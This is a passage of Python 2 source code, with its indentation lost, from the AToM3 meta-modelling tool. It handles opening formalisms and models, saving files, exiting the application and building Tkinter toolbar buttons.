text += "Last/Default dir is: " + self.initialDirectoryDict[ 'OpenMetaModel' ]
openDialog = Dialog.Dialog(None, {'title': 'Opening Formalism',
'text': text,
'bitmap': '',
'default': 0,
'strings': ('Central Formalism Dir','User Formalism Dir','Last/Default Dir', 'Cancel')})
if( openDialog.num == 0 ):
initialDir = META_MODEL_PATH
elif( openDialog.num == 1 ):
initialDir = USER_MMODEL_PATH
elif( openDialog.num == 2 ):
initialDir = self.initialDirectoryDict[ 'OpenMetaModel' ]
else:
return
fileName = tkFileDialog.askopenfilename(title='Open Formalism/Meta-Model',
filetypes=[("Meta-Model files", "*_META.py"),
("Python files", "*.py")],
initialdir=initialDir )
# File dialog was cancelled
if( not fileName): return
# Save the directory for next openMetaModel operation
else:
# Get the path for fileName, which is a subdirectory of a Formalism dir
# So then get the Formalism dir itself, if possible, and save that
newPath = os.path.dirname( fileName )
if( newPath ): newPath = os.path.dirname( newPath )
self.initialDirectoryDict[ 'OpenMetaModel' ] = newPath
dir, file = os.path.split(fileName)
# Add the directory to the sys.path
self.checkInSearchPath( dir )
className = string.split (file, ".") # compose class name
self.GUIModelName = className[0]
historyName = fileName
# Make sure we can find the GUIModel
elif( self.addDirectoryWithModelName(GUIModel, noWarning = True ) ):
self.GUIModelName = GUIModel
# Uh oh, we couldn't find the GUIModel
else:
# If a model is "upgraded" to the new AToM3, the Meta-model name
# changes from "metaname.py" to "metaname_META.py"
# So lets check for this as well
if( GUIModel[-8:] != '_META.py' ):
pathExtTuple = os.path.splitext( GUIModel )
GUIModel = pathExtTuple[0] + '_META' + pathExtTuple[1]
if( self.addDirectoryWithModelName( GUIModel ) ):
self.GUIModelName = GUIModel
else:
return # Nothing worked, give it up
# Wait a sec, is the meta-model already loaded!?!?!
if(self.ASGroot and self.ASGroot.getASGbyName(self.GUIModelName)):
print 'WARNING: Attempt to load formalism', self.GUIModelName, \
'a second time was blocked in', __file__
return
if( printToConsole ):
t = time.time()
#print "-----------------------------------------------------------"
print printToConsoleIndent + "Meta-Model: " + self.GUIModelName
setCursor( self.parent, 'Busy' )
# Check if newly added paths are causing problems
self.sourcePathConflictAwareness()
GUIModel = self.loadGUImodel(self.GUIModelName) # load the GUImodel
if GUIModel == None:
setCursor( self.parent, 'Default' )
return
# retrieve some elements of the GUI...
fileName = GUIModel.Formalism_File.toString() # File where the meta-model is stored.
dir, file = os.path.split(fileName) # split directory and file name
className = string.split (file, ".") # split file name and extension
self.metaModelName = className[0] # store the name of the file
##print '_META file name', self.GUIModelName
##print '_MM file name', self.metaModelName
if not self.ASGroot and not self.editGGLabel: # DO NOT DO THIS IF WE ARE A CHILD WINDOW (THAT IS A gg RULE)
if self.metaModelName in sys.modules.keys(): # file has already been loaded
del sys.modules[self.metaModelName]
if( self.metaModelName == '' ):
print 'Cannot open a meta-model with no name!'
return
try:
exec "from "+self.metaModelName+" import *\n" in self.__dict__, self.__dict__
except ImportError:
print "MetaModel "+self.metaModelName+" could not be found... Aborting"
setCursor( self.parent, 'Default' )
raise
## self.quit()
## sys.exit(1)
except AttributeError:
print "File "+self.metaModelName+" is not a valid meta-model... Aborting"
setCursor( self.parent, 'Default' )
raise
## self.quit()
## sys.exit(1)
# If we already have a menu, add to it
if( self.__dict__.has_key( 'modelMenu' ) ):
self.modelMenu.add_separator()
self.createModelMenu(self, self.modelMenu )
else:
self.parent.config(menu=None) # eliminate old menu
buildAllMenus(self) # Creates a topLevel menu
self.configureUserActions()
self.setConnectivity(self)
if self.console: self.console.appendText('Opening Formalism '+self.metaModelName)
# delete buttons (if the metamodel they represent is not needed...) and then add the new ones
if not merge:
if self.buttonList != []:
for bt in self.buttonList:
if not self.__buttonsNeeded(bt):
try:
bt.pack_forget()
self.buttonList.remove(bt)
del bt
except AttributeError:
buttons = list(bt)[3:]
for b in buttons:
b.pack_forget()
del b
self.buttonList.remove(bt)
# self.toolBar.pack_forget()
oldASGroot = self.ASGroot # keep old instantce of ASGroot
newASGroot = self.createNewASGroot(self) # make a new instance of ASG
# Add the buttons to the toolbar
self.addButtons2ToolBar(GUIModel)
if( merge and oldASGroot): # if we have to merge...
self.ASGroot.merge(newASGroot )
elif( not oldASGroot): # if we did not have an ASGroot
self.ASGroot = newASGroot
# Restore old ASG if we did not have to create a new one
if( createNewRoot == 0 and oldASGroot != None):
self.ASGroot = oldASGroot
# Now lets track the new attributes
self.ASGroot.trackNewASGroot( newASGroot, self.GUIModelName )
# Put the name on the title bar
self.putMetaModelName()
# Recently used files history tracker
if( historyName ):
self.historyManager( self.LASTOPEN_MMODEL, historyName )
# Map *_MM classnames to the *_META classnames
self.openGUI_ModelDict[ self.metaModelName ] = self.GUIModelName
setCursor( self.parent, 'Default' )
if( printToConsole ):
print printToConsoleIndent+" loaded in %0.3f seconds" % ( time.time() - t )
#print "-----------------------------------------------------------\n"
def getOpenMetaModelsList( self, getAllModels=False ):
"""
Returns a list of the *_META classnames that can be used to opn a formalism
You'll notice that this is just a great big ugly hack and is no longer used
By Denis Dube :D
"""
raise Exception, 'getOpenMetaModelsList is still being used, DANGIT!!! Send mayday to d3n14@yahoo.com'
'''
openModelStringList = []
numOpenMetaModels = len( self.openMetaModels.getValue() )
if( numOpenMetaModels > 1 or getAllModels ):
for i in range( 0, numOpenMetaModels ):
# Get the name of the file where the meta-model is stored
d, trueMMname = os.path.split( self.buttonList[i][2] )
# Remove the .py extension
trueMMname = trueMMname[:len(trueMMname)-3]
if( self.openGUI_ModelDict.has_key( trueMMname ) ):
openModelStringList.append( self.openGUI_ModelDict[ trueMMname ] )
else:
print "ERROR: " + trueMMname + " not found in open-meta-model dict"
return []
return openModelStringList
'''
def save (self, export = 0, fileName = None):
"""
Saves the model into disk
"""
# try the global constraints...
res = self.ASGroot.preCondition(ASG.SAVE) # evaluate global pre-conditions
if res: return self.constraintViolation(res) # if violated, show warning and do not save
# try the local constraints...
res = self.ASGroot.evaluateLocalPreCondition(ASG.SAVE) # evaluate global pre-conditions
if res: return self.constraintViolation(res) # if violated, show warning and do not save
res = self.checkModel()
if res: return self.constraintViolation(res) # if violated, show warning and do not save
#todo: add choice
# Do we even have a fileName? If not, we must harass the user...
if( not fileName or (fileName == "Nonamed") ):
text = "Please choose the starting directory for the file dialog\n"
text += "Last/Default dir is: " + self.initialDirectoryDict[ 'OpenSaveModel' ]
openDialog = Dialog.Dialog(None, {'title': 'Saving Model',
'text': text,
'bitmap': '',
'default': 0,
'strings': ('Central Models','Central Formalisms','Last/Default',
'User Models','User Formalisms','Cancel')})
if( openDialog.num == 0 ):
initialDir = MODEL_PATH
elif( openDialog.num == 1 ):
initialDir = META_MODEL_PATH
elif( openDialog.num == 2 ):
initialDir = self.initialDirectoryDict[ 'OpenSaveModel' ]
elif( openDialog.num == 3 ):
initialDir = USER_MODEL_PATH
elif( openDialog.num == 4 ):
initialDir = USER_MMODEL_PATH
else:
return
# Save As Dialog
fileName = tkFileDialog.asksaveasfilename(
filetypes=[("Model files", "*_MDL.py"),
("Python files", "*.py"),("All files","*")],
initialdir=initialDir )
if( not fileName): return # File dialog was cancelled
setCursor( self.parent, 'Busy' )
# ER model naming convention: finishes with '_model'
models = self.openMetaModels.getValue()
ERModelNames = [ 'Entity Relationship', 'EntityRelationshipV3' ]
if( len( models ) == 1 and models[0].getValue() in ERModelNames ):
if( not re.search( '\w*_ER_MDL', fileName ) ):
fileName = os.path.splitext( fileName )[0] #string.split( fileName, '.' )[0]
fileName += '_ER_MDL.py'
# Add the ER model to the sys.path if not already,
# since the modeler may want to generate code
ERmodelPath = os.path.split( fileName )[0]
self.checkInSearchPath( ERmodelPath )
# Python source code must have always have its .py extension...
if( fileName[-3:] != '.py' ):
# Does it have the "Model" extension?
if( fileName[-4:] == '_MDL' ):
fileName += '.py'
else:
fileName += '_MDL.py'
# See if file exists:
if os.path.exists(fileName): # file exists!!
# see if back already exists...
backupFilename = fileName + ".back"
if os.path.exists( backupFilename ): # backup file exists!!
os.remove( backupFilename ) # remove it first
try:
os.rename( fileName, backupFilename )
except:
print "ERROR: Failed to create backup file due to cruel and unusual bug"
# Store all the open meta-models to make this a truly Multi-Formalism system :D
# NOTE: Old AToM3 builds won't have a clue what this means!!!
#openModelStringList = self.getOpenMetaModelsList()
openModelStringList = self.ASGroot.getEntireASGList()
# Call the ASG method to save its contents
self.ASGroot.genCode(fileName, self.types, self.genGraphics, 1,
self.GUIModelName, export, self.newTypes,
openModelStringList=openModelStringList,
attrGenFix=True )
# Update status bar information...
self.statusbar.event(StatusBar.MODEL, StatusBar.SAVE, fileName)
if self.console: self.console.appendText('Saving model in file '+fileName)
# Recently used files history tracker
self.historyManager( self.LASTOPEN_MODEL, fileName )
# Save the directory for next Open or Save operation
self.initialDirectoryDict[ 'OpenSaveModel' ] = os.path.dirname( fileName )
setCursor( self.parent, 'Default' )
def checkInSearchPath(self, dir):
"""
checks if the given directory is in the Python search path.
If this is not the case, it adds the directory to the path
Method simplified by Denis Dube, July 26, 2004 because all
the sys paths are now in absolute form.
"""
dir = os.path.normpath( dir )
# Windows thinks capitilization doesn't matter...
if( sys.platform == 'win32' ):
capitalDir = dir.upper()
for path in sys.path:
if( capitalDir == path.upper() ):
return False
# Linux knows caps make a difference :D
else:
if( dir in sys.path ):
return False
sys.path.append(dir)
return True
def openModelErrorDialog(self, model='N/A'):
"""
Indicate exactly what went wrong and allow user to reset AToM3 paths
"""
from SimpleDialog import SimpleDialog
myText = ''
myText += 'Unable to automatically load the model\'s formalism: "'
if( model[-5:] == '_META' ): model = model[:-5]
myText += model + '"\n\n'
myText += 'Please make sure the formalism directory is located in ONE of the '
myText += 'following two directories:\n\n'
myText += META_MODEL_PATH + '\n'
myText += USER_MMODEL_PATH
myText += '\n\nExamples:\n'
myText += 'Valid: ~\User Formalisms\X\X_META.py\n'
myText += 'Invalid: ~\User Formalisms\X_META.py\n'
myText += 'Invalid: ~\User Formalisms\X\X\X_META.py'
d = SimpleDialog(self.parent, text=myText,
buttons=['Ok I will try that', 'Still not working? Click here to reset paths (Closes AToM3)'],
default=0,
title="ERROR loading model: " + model)
if(d.go() == 1):
from uninstall import uninstall
uninstall(useDialogs=False)
tkMessageBox.showinfo( "Paths Reset",
"Paths have been reset, shutting down AToM3",
parent = self )
try:
self.console.destroy()
except:
pass # So what? Won't lose any sleep over this
try:
self.debugConsole.destroy()
except:
pass # Ditto for the debug console
self.parent.update()
self.parent.destroy()
self.parent.update()
sys.exit(1)
setCursor( self.parent, 'Default' )
return False
def open (self, fileName = None, printToConsole=True ):
"""
opens a model from disk
"""
if( not fileName ):
text = "Please choose the initial file dialog directory\n\n"
text += "Last/Default dir is: \n" + self.initialDirectoryDict[ 'OpenSaveModel' ]
openDialog = Dialog.Dialog(None, {'title': 'Opening Model',
'text': text,
'bitmap': '',
'default': 0,
'strings': ('Central Models','Central Formalisms','Last/Default',
'User Models','User Formalisms','Cancel')})
if( openDialog.num == 0 ):
initialDir = MODEL_PATH
elif( openDialog.num == 1 ):
initialDir = META_MODEL_PATH
elif( openDialog.num == 3 ):
initialDir = USER_MODEL_PATH
elif( openDialog.num == 4 ):
initialDir = USER_MMODEL_PATH
elif( openDialog.num == 2 ):
initialDir = self.initialDirectoryDict[ 'OpenSaveModel' ]
else:
return
fileName = tkFileDialog.askopenfilename(filetypes=[
("Model files", "*_MDL.py"),("Button Models", "*_META.py")
,("Python files", "*.py")],
initialdir=initialDir)
# File dialog was cancelled
if( not fileName): return
# Save the directory for next Open or Save operation
self.initialDirectoryDict[ 'OpenSaveModel' ] = os.path.dirname( fileName )
setCursor( self.parent, 'Busy' )
self.parent.update()
if( not os.path.exists( fileName ) ):
tkMessageBox.showerror( "File Not Found ",
"ATOM3.open() could not find:\n\n" + fileName,
parent = self )
setCursor( self.parent, 'Default' )
return
dir, file = os.path.split(fileName)
if( printToConsole ):
t = time.time()
#print "***********************************************************\n"
print "\nLoading model: ", file[:-3]
# Lets find out which meta-model this model was made with (search the file line by line)
f = open( fileName , 'r' )
model = None
isModelAList = False
for line in f:
# Look for a string with the meta-model name
match = self.LOADED_MM_PATTERN.search( line )
if( match ):
model = match.group(1)
break
# Look for a list with the meta-model names
match = self.LOADED_MM_LIST_PATTERN.search( line )
if( match ):
stringLine = match.group()
exec( stringLine )
isModelAList = True
break
#print 'Meta-model: ', model, '== "LIN_FUN_V0_META":', model == 'LIN_FUN_V0_META'
# Add the source path corresponding to each model in the list
if( isModelAList ):
for model in loadedMMName:
if( not self.addDirectoryWithModelName( model, noWarning = True ) ):
tkMessageBox.showerror( "Open model error",
"Could not find the following meta-model: "
+str(model)+"\n\nSince the model you are "+
"attempting to load requires that "+
"meta-model, AToM3 will now abort." ,
parent=self)
return
# No model at all found in the file...
elif( not model ):
dir = self.openModelErrorDialog( 'unknown meta-model' )
# Add the source path corresponding to the single model string
elif( not self.addDirectoryWithModelName( model, noWarning = True ) ):
# If a model is "upgraded" to the new AToM3, the Meta-model name
# changes from "metaname.py" to "metaname_META.py"
# So lets check for this as well
if( model[-8:] != '_META.py' ):
pathExtTuple = os.path.splitext(model)
model = pathExtTuple[0] + '_META' + pathExtTuple[1]
if( not self.addDirectoryWithModelName( model, noWarning = True ) ):
# Everything failed, ask the user to find the meta-model...
dir = self.openModelErrorDialog(model)
if( not dir ): return
className = string.split (file, ".") # compose class name
self.newfunction = None
if className[0]:
self.checkInSearchPath(dir)
# first check if it has been loaded before, to force a recompilation
if className[0] in sys.modules.keys(): # file has already been loaded
del sys.modules[className[0]]
# delete to force a reload
# Load the model from the file, new method (Doesn't contaminate local namespace)
try:
exec "import "+className[0]+"\n"
except:
raise
tkMessageBox.showerror("Error", "Could not open model, importation problem" )
return
# Load newfunction (name of the method which loads the saved model)
try:
newfunction = eval( className[0] + '.newfunction' )
except:
tkMessageBox.showerror("Error", "Could not open model, newfunction attribute not found" )
print className[0] + '.newfunction'
raise
return
# Load meta-model environments required for this model to load
try:
loadedMMName = eval( className[0] + '.loadedMMName' )
except:
loadedMMName = None
# Load any special types required by this model
try:
typeInfoList = eval( className[0] + '.loadedTypes' )
except:
typeInfoList = []
try:
self.loadTypes(typeInfoList)
except:
print '\nERROR: AToM3.open() is unable to load the types defined in',
print 'the model:', typeInfoList
print '\nAs a quick fix: edit the *_MDL.py file (end part) and remove',
print 'the line starting with "loadedTypes = "'
print '\nThe raw error message will now be raised',
print '(and AToM3 will close ungracefully):\n'
raise # <-- You can remove this if you want, it IS informative though
# Load the AToM3 version that saved this model
try:
version = eval( className[0] + '.atom3version' )
except:
version = '0.2.2'
# List of meta-models to load (needed for this model)
if( type( loadedMMName ) == type( list() ) ):
#todo: warn loading
for loadName in loadedMMName:
# No meta-model open, just open this new meta-model
if( not self.ASGroot):
self.openMetaModel( loadName, 0, 1,
printToConsole=printToConsole,
printToConsoleIndent=' ')
# No non-root secondary meta-model open by that name
elif( not self.ASGroot.getASGbyName( loadName ) ):
self.openMetaModel(loadName, 1, 0,
printToConsole=printToConsole,
printToConsoleIndent=' ')
# Single meta-model to load (needed for this model)
elif( type( loadedMMName ) == type( str() ) ):
# No meta-model open, just open this new meta-model
if( not self.ASGroot):
self.openMetaModel( loadedMMName, 0, 1,
printToConsole=printToConsole, printToConsoleIndent=' ')
# No non-root secondary meta-model open by that name
elif( not self.ASGroot.getASGbyName( loadedMMName ) ):
self.openMetaModel(loadedMMName, 1, 0,
printToConsole=printToConsole, printToConsoleIndent=' ')
loadedMMName = [loadedMMName] # Make this a list for later...
# No Meta-Model? WTF? Abort!
else:
raise Exception, 'Could not load model, no meta-model name found'
return
#print "Running newfunction of model to be opened ", newfunction
setCursor( self.parent, 'Busy' )
self.isLoadingModel = True
#todo: if N formalisms, then N root nodes
if( version == '0.3' ):
#allASGnames = self.ASGroot.getEntireASGList()
allASGlist = []
for name in loadedMMName:
ASG = self.ASGroot.getASGbyName(name)
if( ASG ): allASGlist.append( ASG )
else: print "\n\nUh oh! This is *not* good...",loadedMMName
newfunction(self, self.ASGroot, *allASGlist )
else:
newfunction(self, self.ASGroot)
self.isLoadingModel = False
# if we have loaded successfully a file, then update status bar...
self.statusbar.event(StatusBar.MODEL, StatusBar.LOAD, fileName) # update status bar
if self.console: self.console.appendText('Loading model from file '+fileName)
# Optimize the loaded model
#selectAllVisibleObjects( self )
#optimizeConnectionPorts( self )
self.cb.highlighter(0)
self.cb.clearSelectionDict()
# For QOCA constraints... See ASG.processLoadedLinkNodes() for more
self.ASGroot.processLoadedLinkNodes(True)
# Sometimes after loading a large model AToM3 takes a break
# But there are no unpaid breaks now! Ahahaha. Haha. Bah.
self.parent.update()
# Recently used files history tracker
self.historyManager( self.LASTOPEN_MODEL, fileName )
if( printToConsole ):
print "Model %s opened in %0.3f seconds" % (file[:-3], time.time() - t )
#print "***********************************************************\n"
setCursor( self.parent, 'Default' )
def isATOM3LoadingModel(self):
""" Can be handy to know this... """
return self.isLoadingModel
def exitFromATOM3(self, unUsed = None, noDialog=False):
"""
Exits from the current ATOM3 instance
Returns True if it really exited, and False if the user chickened out.
"""
if self.IsMainKernel:
# check status, and if we have not saved, present a message...
st, fl = self.statusbar.getState(StatusBar.MODEL)
if(fl):
lastFile = fl[0]
print '\nQuick start AToM3 with last model (E-mail denkkar@gmail.com if not working on Linux):'
lastFile = string.replace(lastFile, '\\\\', '/')
print 'atom3nosplash.py ' + lastFile#string.replace(lastFile, '\\', '\\\\')
if(st == StatusBar.MODIFIED and not noDialog):
if( fl ):
filename = fl[0]
else:
filename = "unknown"
saveDialog = Dialog.Dialog(None, {'title': 'Model Modified',
'text':
'"'+str(filename)+'"'
' has been modified since the last time it was saved.'
'\n\nDo you want to save it before exiting the application?',
'bitmap': '',
'default': 0,
'strings': ('Save Model','Discard Changes','Return to AToM3')})
# Return to editor
if( saveDialog.num == 2 ):
return False
# Save changes
elif( saveDialog.num == 0 ):
if fl != 'Nonamed': self.save(0, fl[0]) # Quick save
else: self.save(0) # Full save dialog
# Save initial directories
self.optionsDatabase.set(self.LAST_INITIAL_DIRS, self.initialDirectoryDict)
if( self.optionsDatabase.saveOptionsDatabase() == True ):
doTempCleanupALL() #<-- REMOVE ALL TEMP FILES!
else:
try:
doTempFileCleanup() #<--- Remove temporary Undo & Copy files...
doTempCleanupChoice() # <-- and other temp files....
except:
pass
#self.optionsDatabase.releaseOptionLock() #<--- Let others be able to save options
try:
self.console.getRootTK().destroy()
except:
pass # So what? Won't lose any sleep over this
try:
self.debugConsole.getRootTK().destroy()
except:
pass # Ditto for the debug console
self.parent.destroy()
#self.quit()
#sys.exit(1)
else:
# self.destroy()
self.parent.destroy()
return True
def addButtons2ToolBar (self, GUIModel):
"""
Adds the buttons to the toolbar. The specific buttons (that must be created here on the fly) of
the meta-model are in the GUIModel.
"""
formalismName = GUIModel.Formalism_Name.toString() # 'User-friendly' name of the formalism
# Buttons per row, use the meta-models value if there isn't a global overide in effect
rowSize = self.optionsDatabase.get(self.BUTTONS_PER_ROW)
if( rowSize <= 0 ):
rowSize = GUIModel.RowSize.getValue()
formalismFile = GUIModel.Formalism_File.toString() # meta-model file
fName = string.replace(formalismName, " ", "_")
mmToolBar = Frame(self.toolBar, relief = RAISED)
b = Label(mmToolBar, text = formalismName, fg="darkgreen",
bg="white", font = ("Helvetica",10), relief = GROOVE, padx=1)
b.pack(side = TOP, fill = X, ipady = 2)
self.openMetaModels.newItem(ATOM3String(formalismName))
metaModelInfo = [mmToolBar, formalismName, formalismFile]
auxPanel = Frame(mmToolBar, relief = GROOVE)
counter = 0
def findImageFile( fileName ):
""" Finds the image by looking in all dirs with Formalisms """
filePath = os.path.normpath( os.path.join( META_MODEL_PATH,
os.path.normpath( fileName ) ) )
#print 'filePath', filePath
if( os.path.exists( filePath ) ): return filePath
filePath = os.path.normpath( os.path.join( USER_MMODEL_PATH,
os.path.normpath( fileName ) ) )
if( os.path.exists( filePath ) ): return filePath
filePath = os.path.normpath( os.path.join( SOURCE_CODE_PATH,
os.path.normpath( fileName ) ) )
if( os.path.exists( filePath ) ): return filePath
return None
# Important Notice: To correctly create buttons with images, we have to create
# a different attribute name for each...
# imgAttrName = "ImgButton"
for node in GUIModel.listNodes['ButtonConfig']: # for each 'ButtonConfig' in the model...
text = 1
if node.Contents.lastSelected == 'Text': # check if we should put a text in the button
buttonText = node.Contents.Text.toString() # get the button text...
elif node.Contents.lastSelected == 'Image':
text = 0
buttonImageFileName = findImageFile( node.Contents.Image.toString() )
if( not buttonImageFileName ):
text = 1
buttonText = node.Contents.Image.toString()
if( not text ):
self.buttonImage.append(PhotoImage(file = buttonImageFileName))
self.numImg = self.numImg+1
newDrawingMode = node.Drawing_Mode.getValue()[1] # see if we have to create a new mode
name, lang, kind, act, code = node.Action.getValue() # Unwrap action...
"""
#if newDrawingMode:
functionName = fName+str(counter) # compose function name
# see if the function is present yet
if( not functionName in self.__dict__.keys() ):
functionHeader = "def "+functionName+"(self, wherex, wherey ):\n" # compose function header
functionBody = " " +string.replace(code,'\n', '\n ')+"\n" # compose function body
# Path to a temp file (make sure it's empty)
path = os.path.split( __file__ )[0]
path = os.path.join( path, 'temporaryFILE923.py' )
if( os.path.exists( path ) ): os.remove( path )
# Open the temp file and create our method...
tempFile = open( path, 'w')
tempFile.write( functionHeader + functionBody )
tempFile.close()
# Make sure an earlier method is not in memory...
if( sys.modules.has_key( 'temporaryFILE923' ) ):
del sys.modules['temporaryFILE923']
import temporaryFILE923
# Cleanup temp files
try:
if( os.path.exists( path ) ): os.remove( path )
if( os.path.exists( path+'c' ) ): os.remove( path+'c' )
except:
pass
# Extract our compiled method
if( temporaryFILE923.__dict__.has_key(functionName) ):
self.__dict__[functionName] = temporaryFILE923.__dict__[functionName]
method = self.__dict__[functionName] # obtain a reference to the method
newMode = "NEWMODE"+fName+str(counter) # create a new Mode for the button
if not node.Drawing_Mode.getValue()[1]: # Is it a method 2b executed right away? (added 27 July 2002, JL)
newMode = newMode+"&&EXEC" # This distinguishes the executable modes (added 27 July 2002, JL)
self.userActionsMap[newMode] = method # set the userACtionsMap dictionary
"""
#if newDrawingMode:
functionName = fName+str(counter) # compose function name
# see if the function is present yet
if not functionName in self.__dict__.keys():
functionHeader = "def "+functionName+"(self, wherex, wherey ):\n" # compose function header
functionBody = " " +string.replace(code,'\n', '\n ')+"\n" # compose function body
#todo: BAD CODE
# This generates a Syntax Warning whenever a from x import * statement occurs
# This really should not have been necessary!!!
# Fix idea: save method to a file, then load the file, not sure if it'd will do though...
# Why it's bad: http://www.python.org/doc/2.2.3/whatsnew/node9.html
exec functionHeader+functionBody in self.__dict__, self.__dict__ # 'create' new method
method = self.__dict__[functionName] # obtain a reference to the method
newMode = "NEWMODE"+fName+str(counter) # create a new Mode for the button
if not node.Drawing_Mode.getValue()[1]: # Is it a method 2b executed right away? (added 27 July 2002, JL)
newMode = newMode+"&&EXEC" # This distinguishes the executable modes (added 27 July 2002, JL)
self.userActionsMap[newMode] = method # set the userACtionsMap dictionary
if text:
newButton = Button(auxPanel, text = buttonText,
bg="white", activebackground="white" )
else:
newButton = Button(auxPanel,
image = self.buttonImage[self.numImg],
bg="white", activebackground="white" )
self.modes[newButton] = newMode # set the bind newButton->changeMode
newButton.bind("<ButtonRelease-1>", self.changeMode)
# Proof of concept: could have a window popup up with help info...
# This stuff merely makes passing a cursor over a button VERY obvious
def handler( event, button = newButton ):
button.configure( bg='firebrick2', activebackground='SpringGreen2',
borderwidth=2, relief='groove' )
newButton.bind( '<Enter>', handler)
def handler( event, button = newButton ):
button.configure( bg='white', activebackground='white',
borderwidth=2, relief='raised' )
newButton.bind( '<Leave>', handler)
# This makes the right mouse button behave just like the left mouse button
def modelButtonPress3( button ):
button.configure( relief = "sunken" )
def modelButtonRelease3(self,event,button):
button.configure( relief = "raised" )
self.changeMode(event)
newButton.bind("<Button-3>",
lambda event,n=newButton: modelButtonPress3(n) )
newButton.bind("<ButtonRelease-3>",
lambda event,n=newButton,s=self: modelButtonRelease3(s,event,n) )
newButton.pack(side=LEFT, padx=2)#, pady=2, fill=X, expand=1)
counter = counter + 1
if(counter % rowSize == 0): # check if we have rowSize elements in the row
auxPanel.pack(side=TOP)#, ipady=10, ipadx=10)
auxPanel = Frame(mmToolBar, relief = GROOVE)
metaModelInfo.append(newButton)
self.buttonList.append(tuple(metaModelInfo))
auxPanel.pack(side=TOP, fill=X)#, ipady=20)
emptyPanel = Frame(mmToolBar)
emptyPanel.pack(side=BOTTOM, fill=Y, expand=1)
mmToolBar.pack(side=LEFT, fill=Y)
# To push the buttons to the top of the panel, put an empty frame
# in the bottom.
#emptyPanel = Frame(self.toolBar, bg="black")
#emptyPanel.pack(side=BOTTOM, fill=BOTH,expand=1)
# Toolbar items may have changed
self.parent.update()
self.configureToolbar()
#....................................................
def chooseLinkType(self, listOfLinks):
""" Function that presents a dialog box to choose a link type
- listOfLinks: is a list of tuples (<class-name>, <method-2-create-instance-of-class>)
- returns the tuple that's been selected
"""
# first we create a list of ATOM3Strings using the first component of the tuples...
if( 0 ):
A3StringList = []
for link in listOfLinks:
ns = ATOM3String(link[0])
A3StringList.append(ns)
# create an ATOM3List of Strings with the initial value set to the previous list
atl = ATOM3List([0,0,0,0], ATOM3String)
atl.setValue(A3StringList)
# Present the previous list in a dialog box
dlb = ATOM3TypeDialog(self, atl)
if dlb.result_ok:
return listOfLinks[dlb.widget.lastSelection]
# Popup menus are more l33t :D
else:
stringList = []
for link in listOfLinks:
stringList.append( link[0] )
title = 'Link Type'
actionLabel = 'Select'
index = self.popupMenuCreator.listChoicePopup( title,stringList,actionLabel )
# Unacceptable result, must have a valid choice or exception will occur
if( index == 0 ): return self.chooseLinkType( listOfLinks )
return listOfLinks[ index-1 ]
def modelAttributes(self, metaModelASG = None ):
"""
Edits model attributes, including global constraints...
Can handle multiple meta-models at once.
"""
# User provides a specific ASG to edit...
if( metaModelASG ):
val = ATOM3TypeDialog(self, metaModelASG )
# Now we know when the user has finished editing the ASG options
metaModelASG.postCondition (ASGNode.EDIT)
# We'll try and figure out which ASG to edit...
else:
self.ASGroot.showASGattributesDialog( self )
# Now we know when the user has finished editing the ASG options
self.ASGroot.postCondition (ASGNode.EDIT)
return
#todo: site of a major hack
"""
metaModelASG = self.ASGroot
if( metaModelASG.mergedASG ):
ASGList = metaModelASG.mergedASG[:] + [metaModelASG]
stringList = []
for ASG in ASGList:
stringList.append( ASG.__class__.__name__ )
title = 'Choose Meta-Model'
actionLabel = 'Select'
index = self.popupMenuCreator.listChoicePopup( title,stringList,actionLabel )
# Invalid result? Quit
if( index == 0 ): return
# Valid result? Use this metaModelASG then.
metaModelASG = ASGList[ index-1 ]
ATOM3TypeDialog(self, metaModelASG )
"""
def showConsole(self):
""" Shows the console, if it is hidden """
if( self.debugConsole.showWindow() == -1 ):
self.debugConsole = DebugConsole(self)
self.debugConsole.showWindow()
if( self.console.showWindow() == -1 ):
self.console = Console(self)
self.console.showWindow()
def find_visible_closest (self, x, y, canvas, limit=50,ignore=None):
"""
Returns the closest item to (x, y) which is visible.
If the item has 4 or more coordinates, then the distance of (x0,y0) to the segments defined by each
4 consecutives coordinates (x1, y1) (x2, y2) are calculated:
Added : 10 July 2002 JL
"""
# Check if a "current" item is selected, could save us some trouble
itemHandler = canvas.find_closest(x,y)
if( itemHandler and itemHandler[0] != ignore \
and self.__isItemVisible(itemHandler[0], canvas) ):
tags = canvas.gettags( itemHandler[0] )
if( "current" in tags ):
return (itemHandler[0], )
minDistance = 20000 # mimimum distance
minDistItem = -1 # item with minimum distance
# items tuple with all the items within a certain region
items = canvas.find_overlapping(x-limit, y-limit, x+limit, y+limit)
segmin = None
for item in items: # get the item with minimum distance
if( self.__isItemVisible(item, canvas) and (item != ignore) ):
if canvas.type(item) == 'text':
crd = canvas.bbox(item)
else:
crd = canvas.coords(item)
ncoords = len(crd)
# Entity or link... [0,0, 1,1, 2,2, 3,3] [0,2,4]
if ncoords >=4:
for i in range(0, ncoords-3, 2):
# Check if x0 == x1 and y0 == y1, point object
if crd[i] == crd[i+2] and crd[i+1] == crd[i+3]:
distance = self.__dist(crd[i], crd[i+1], x, y) # math.sqrt(abs((crd[i]-x)*(crd[i]-x)+(crd[i+1]-y)*(crd[i+1]-y)))
# Check distance between event and the segement line described by x0,y0,x1,y1
else:
distance = self.__point2Segment(x, y, crd[i], crd[i+1], crd[i+2], crd[i+3])
if( distance < minDistance ):
# Ignore items without tags --> Probably the snap grid
tags = canvas.gettags( item )
if( len(tags) == 0 or tags[0] == 'current' ): continue
segmin = crd[i], crd[i+1], crd[i+2], crd[i+3]
minDistance = distance
minDistItem = item
# Point object
else:
distance = self.__dist(crd[0], crd[1], x, y) # math.sqrt(abs((crd[0]-x)*(crd[0]-x)+(crd[1]-y)*(crd[1]-y)))
if distance < minDistance:
segmin = crd[0], crd[1]
minDistance = distance
minDistItem = item
#print " type = ", self.UMLmodel.type(item)
#print " - coords = ", crd
#print " - dist = ", distance
#print "************************", minDistance, x, y
return (minDistItem, )
def editclass(self, x, y, itemHandler = None ):
"""
Edits the nearest class that can be found in the canvas,
UNLESS you specify an itemHandler, in which case will use that one
"""
self.cb.setEditState(None, None) # Reset edit state
dc = self.getCanvas()
# Get an itemHandler to edit...
if( itemHandler ):
ct = itemHandler
else:
# Assume we recieve x,y as event.rootx,event.rooty pair
# So must normalize to put them back in the canvas area
xx,yy = self.cb.getLastClickCoord()
ct = self.find_visible_closest(xx,yy, dc)
# Get the tag and then have fun...
tags = dc.gettags(ct)
if tags:
# try the global constraints...
if not self.editGGLabel:
res = self.ASGroot.preCondition(ASG.EDIT)
if res: # global constraint do not hold!
self.constraintViolation(res)
return
if( VisualObj.Tag2ObjMap.has_key( tags[0] ) ):
obj = VisualObj.Tag2ObjMap[tags[0]]
